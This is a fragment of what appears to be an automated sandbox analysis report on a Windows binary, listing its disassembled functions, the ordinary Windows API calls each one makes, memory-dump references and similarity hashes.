                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrcpyW.KERNEL32(00000000,?,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A89719
                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrcmpiW.KERNEL32(00000000,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?), ref: 00A8974A
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A8828A
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A882B0
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A882EB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                • String ID: cdecl
                                                                                                                                                                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                • Opcode ID: 32ad3eb2f7c974ce77b06cfadb4d27e7ba678de22ac249f8e5a313b377be5939
                                                                                                                                                                                                                                                                • Instruction ID: 900ab09bf4ff632616d08d8a839a91877c9d7e6c6fb512566b03d508685d4bd7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32ad3eb2f7c974ce77b06cfadb4d27e7ba678de22ac249f8e5a313b377be5939
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A811E63A200342ABCB15BF78D845E7A77E9FF85750B50412AF946CB261FF359812D790
                                                                                                                                                                                                                                                                Function 00AB60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AB615A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB616C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB6177
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB62B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 455545452-0
                                                                                                                                                                                                                                                                • Opcode ID: 8f0964d5ca56cb1677d8570643a57af324b045346a3a405d5921d33f9d262502
                                                                                                                                                                                                                                                                • Instruction ID: a1afd6e26a8d19d1b3006fbea2f92d6393ca99940ba4180ec1a089cb0af363ce
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f0964d5ca56cb1677d8570643a57af324b045346a3a405d5921d33f9d262502
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B118175900218A6DB10DFA5DC84BFEBBBCFB55354F14412AFA15D6083EB78C941CBA0
                                                                                                                                                                                                                                                                Function 00A52079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a409d58f3119173cde42ad11d3f3f08053a4c1ab9c69903b469af711696976e7
                                                                                                                                                                                                                                                                • Instruction ID: 4944030a0f866f656f437242d601270111086e6fbd2e4dbcd0c07e9fb2add872
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a409d58f3119173cde42ad11d3f3f08053a4c1ab9c69903b469af711696976e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45018FB22062167EF62126B87CC0F27671DFF523BAB300725BD21A11E1EA708C89C260
                                                                                                                                                                                                                                                                Function 00A82374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00A82394
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823A6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823BC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823D7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 9ab9b2b6b1315da3fa739ae23e26b6988ca885891d6d5b0aa6be9b1f738339a7
                                                                                                                                                                                                                                                                • Instruction ID: 208f068dc87bc54b1a83084806e1225e98acdd249ac08d99cc9718cf8d586875
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab9b2b6b1315da3fa739ae23e26b6988ca885891d6d5b0aa6be9b1f738339a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6110C7A900218FFEB11EB95CD85FADBB78FB08750F200091E601B7290D6716E51DB94
                                                                                                                                                                                                                                                                Function 00A21AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A21AF4
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A631F9
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00A63203
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A6320E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ae6bc21ce829566b3655a67ba0244541dca536a06db7801c9d4365ee31df6f2
                                                                                                                                                                                                                                                                • Instruction ID: 5dcf7f8d565b1d3c7029a94bcd517445ac6f09e3c966bf31e11496c9fcb65d1e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ae6bc21ce829566b3655a67ba0244541dca536a06db7801c9d4365ee31df6f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5113D32901029ABDF10DF98D9469EE77B8FB05380F100566F902E3151D771BA52CBA1
                                                                                                                                                                                                                                                                Function 00A8EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8EB14
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00A8EB47
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A8EB5D
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A8EB64
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                • Opcode ID: 71d0e35fa91f3652db3d8267428d36f574deeae9a4cc429084f2529803910060
                                                                                                                                                                                                                                                                • Instruction ID: d061d7592aa8129c6a6316816a6b8a4e770371c27585a9710241fddac38d57c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d0e35fa91f3652db3d8267428d36f574deeae9a4cc429084f2529803910060
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB1126B6904218FBC701EBE89C09A9F7FADEB45320F008316F815E72A1E674CD0587A0
                                                                                                                                                                                                                                                                Function 00A4D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,00A4D369,00000000,00000004,00000000), ref: 00A4D588
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A4D594
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A4D59B
                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 00A4D5B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 173952441-0
                                                                                                                                                                                                                                                                • Opcode ID: 419ecb633310b528c4a41535922038e8a4288cb6bed9205e9c1444487b645e6c
                                                                                                                                                                                                                                                                • Instruction ID: deb8960e3efc16c376b9e09158b72b241ad5c319eab069f9e49c7c9ebf5688a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419ecb633310b528c4a41535922038e8a4288cb6bed9205e9c1444487b645e6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701F93A4001147BCB106FA5EC09BAE7B68EFC1335F100319F9258A1E0DF708801C6A2
                                                                                                                                                                                                                                                                Function 00A27873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                • Opcode ID: db9d5f69d463cd60e0c7eb30d627fb67b3bd40c543aa32b39df053017db94632
                                                                                                                                                                                                                                                                • Instruction ID: 13e6894caa6ea74df6d1a1ac546813c2ffe3770180c0384f5f77e7352d07d328
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db9d5f69d463cd60e0c7eb30d627fb67b3bd40c543aa32b39df053017db94632
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4611AD72505119BFDF169F98EC58EEA7B69FF08364F040225FA0052120D731DDA0EBA0
                                                                                                                                                                                                                                                                Function 00A533E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue), ref: 00A53418
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue,00AC3260,FlsSetValue,00000000,00000364,?,00A531B9), ref: 00A53424
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue,00AC3260,FlsSetValue,00000000), ref: 00A53432
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                • Opcode ID: ea25d829b3a5158b84ec59ec76c5525218dd5173b1e40775499eaaed2fe5a772
                                                                                                                                                                                                                                                                • Instruction ID: 280df241de13ed3fa706c1ac4c8b3efee0a4cd462e1068f07d9826f3b0c1eb98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea25d829b3a5158b84ec59ec76c5525218dd5173b1e40775499eaaed2fe5a772
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4018833612222ABCF228BB9AC449567BB8BF95BE37214720FD06D7151D731DD06C6E0
                                                                                                                                                                                                                                                                Function 00A8BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BA8B
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BAB0
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BABA
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BAED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                • Opcode ID: 58dcdbc1dff83dd10849ef455cf074c3c7e88ff75bc2dcf67942d0621a632a49
                                                                                                                                                                                                                                                                • Instruction ID: 6ade0c8ecb4479a523392f82c119f70e906ea780eead93a75c8cb34aa95a9372
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58dcdbc1dff83dd10849ef455cf074c3c7e88ff75bc2dcf67942d0621a632a49
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82118B74C10629EBCF08EFE9E9486EEFB78BF09751F100285D941B2251DB309651CBA1
                                                                                                                                                                                                                                                                Function 00AB886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AB888E
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB88A6
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB88CA
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AB88E5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                                                                • Opcode ID: 10d22e6bf4c4cbcee10f711bacc4c7cb64d49bac730fd84e34d6a2e6f36e3ca4
                                                                                                                                                                                                                                                                • Instruction ID: 7d0551185de2188ac348c174c7f9849dc665e8907e838214d57b3a36262473b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10d22e6bf4c4cbcee10f711bacc4c7cb64d49bac730fd84e34d6a2e6f36e3ca4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A1143B9D00209AFDB41CF98C8849EEBBB9FB08314F504156E915E2221E735AA55CF50
                                                                                                                                                                                                                                                                Function 00A836F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A83712
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A83723
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8372A
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A83731
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                • Opcode ID: efded029cd8f8909a366e2d7c097fc03a56a0e659fcddbbc5e61fdccb198d326
                                                                                                                                                                                                                                                                • Instruction ID: 28d889b1787fe5bc08651bf29a084b5580391f96e85917f3a2a9350e8af0d37c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efded029cd8f8909a366e2d7c097fc03a56a0e659fcddbbc5e61fdccb198d326
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E092B21012247BDB20A7E29C4DEEB7F6CDF42FA1F400215F106E20A1EAA0C941C2B0
